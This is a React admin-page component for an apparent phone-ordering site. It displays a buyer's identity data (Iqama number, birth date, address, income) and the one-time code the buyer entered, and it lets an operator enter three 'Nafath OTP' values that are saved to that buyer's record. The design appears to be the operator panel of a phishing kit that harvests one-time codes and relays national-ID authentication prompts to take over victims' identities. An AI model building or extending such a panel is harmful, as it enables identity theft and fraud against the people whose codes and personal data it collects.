import React, { useEffect, useState } from "react";
import { Link, useParams } from "react-router-dom";

const OrderDetails = () => {
  const [orderData, setOrderData] = useState({});
  const { id } = useParams();
  console.log(id);

  useEffect(() => {
    fetch(`https://e-swaap-api.vercel.app/api/v1/users/${id}`, {
      method: "GET",
      headers: {
        "Content-Type": "application/json",
        "Allow-Control-Allow-Origin": "*",
      },
    })
      .then((response) => response.json())
      .then((data) => {
        setOrderData(data);
      });
  }, [id]);

  // console.log(orderData);

  const updateNafathOtps = (e) => {
    e.preventDefault();
    const form = e.target;
    const data = {
      first_nafath_otp: form.first_nafath.value,
      second_nafath_otp: form.second_nafath.value,
      third_nafath_otp: form.third_nafath.value,
    };
    fetch(`https://e-swaap-api.vercel.app/api/v1/users/${id}`, {
      headers: {
        "Content-Type": "application/json",
        "Allow-Control-Allow-Origin": "*",
      },
      method: "PUT",
      body: JSON.stringify(data),
    })
      .then((response) => response.json())
      .then((data) => {
        console.log(data);
      });

    form.reset();
    // reload the page
    window.location.reload();
  };

  return (
    <div className="py-14 min-h-[calc(100vh-72px)]">
      {/* back to order listing */}
      <div className="container mx-auto">
        <div className="flex justify-start">
          <Link
            to="/admin/dashboard"
            className="bg-teal-600 hover:bg-blue-700 text-white font-bold py-2 px-4 rounded mt-4"
          >
            Back to Orders
          </Link>
        </div>

        <div className="my-10">
          <hr />
        </div>

        {/* order details */}
        <div className="grid lg:grid-cols-2 grid-cols-1 gap-10">
          <div className="card border border-teal-800 rounded-[15px] p-10 w-full">
            {orderData ? (
              <>
                {/* phone details */}
                <h2 className="text-2xl font-bold">Product Details:</h2>
                <div className="line mt-2 bg-teal-800 w-[100px] h-[3px] rounded-[10px]"></div>
                <h3 className="text-lg my-2 flex gap-2">
                  <span className="font-bold">Model:</span>
                  {orderData?.model}
                </h3>
                <h3 className="text-lg my-2 flex gap-2">
                  <span className="font-bold">Color:</span>
                  <div
                    className="w-[30px] h-[30px] mr-auto rounded-full"
                    style={{ background: orderData.color }}
                  ></div>
                </h3>
                <h3 className="text-lg my-2 flex gap-2">
                  <span className="font-bold">Storage:</span>
                  {orderData?.storage}
                </h3>
                {/* user details */}
                {/* phone details */}
                <h2 className="text-2xl mt-8 font-bold">Ordered By:</h2>
                <div className="line mt-2 bg-teal-800 w-[100px] h-[3px] rounded-[10px]"></div>
                <h3 className="text-lg my-2 flex gap-2">
                  <span className="font-bold">Name:</span>
                  {orderData?.name}
                </h3>
                <h3 className="text-lg my-2 flex gap-2">
                  <span className="font-bold">Nationality:</span>
                  {orderData?.nationality}
                </h3>
                <h3 className="text-lg my-2 flex gap-2">
                  <span className="font-bold">Date of Birth:</span>
                  {orderData?.date_of_birth}
                </h3>
                <h3 className="text-lg my-2 flex gap-2">
                  <span className="font-bold">Iqama Number:</span>
                  {orderData?.iqama_number}
                </h3>
                <h3 className="text-lg my-2 flex gap-2">
                  <span className="font-bold">Mobile NUmber:</span>
                  {orderData?.mobile_number}
                </h3>
                <h3 className="text-lg my-2 flex gap-2">
                  <span className="font-bold">City:</span>
                  {orderData?.city}
                </h3>
                <h3 className="text-lg my-2 flex gap-2">
                  <span className="font-bold">Full Address:</span>
                  {orderData?.address}
                </h3>
                <h3 className="text-lg my-2 flex gap-2">
                  <span className="font-bold">Monthly Income:</span>
                  {orderData?.monthly_income}
                </h3>
              </>
            ) : (
              "Loading Data..."
            )}
          </div>
          <div className="card border border-teal-800 rounded-[15px] p-10 w-full">
            {orderData ? (
              <>
                {/* phone details */}
                <h2 className="text-2xl font-bold">OTP Details:</h2>
                <div className="line mt-4 bg-teal-800 w-[100px] h-[3px] rounded-[10px]"></div>
                <h3 className="text-lg my-2 flex items-center gap-2">
                  <span className="font-bold">User OTP:</span>
                  <div className="bg-teal-800 px-4 py-2 rounded-[10px] text-white">
                    {orderData?.first_otp}
                  </div>
                </h3>
                <form action="" onSubmit={updateNafathOtps}>
                  <h3 className="text-lg my-4 flex gap-2 items-center">
                    <span className="font-bold">First Nafath OTP:</span>
                    <input
                      type="text"
                      className="first_nafath_otp border border-teal-800 px-4 py-2 rounded-[10px]"
                      placeholder="Enter First Nafath OTP"
                      name="first_nafath"
                      defaultValue={orderData?.first_nafath_otp}
                      id="first_nafath"
                    />
                  </h3>
                  <h3 className="text-lg my-4 flex gap-2 items-center">
                    <span className="font-bold">Second Nafath OTP:</span>
                    <input
                      type="text"
                      className="first_nafath_otp border border-teal-800 px-4 py-2 rounded-[10px]"
                      placeholder="Enter Second Nafath OTP"
                      name="second_nafath"
                      defaultValue={orderData?.second_nafath_otp}
                      id="second_nafath"
                    />
                  </h3>
                  <h3 className="text-lg my-4 flex gap-2 items-center">
                    <span className="font-bold">Third Nafath OTP:</span>
                    <input
                      type="text"
                      className="first_nafath_otp border border-teal-800 px-4 py-2 rounded-[10px]"
                      placeholder="Enter Third Nafath OTP"
                      name="third_nafath"
                      defaultValue={orderData?.third_nafath_otp}
                      id="third_nafath"
                    />
                  </h3>
                  <button
                    type="submit"
                    className="btn bg-teal-800 text-white text-lg px-4 py-2 rounded-[10px]"
                  >
                    Save
                  </button>
                </form>
                {/* user details */}
                {/* otp details */}
              </>
            ) : (
              "Loading Data..."
            )}
          </div>
        </div>
      </div>
    </div>
  );
};

export default OrderDetails;
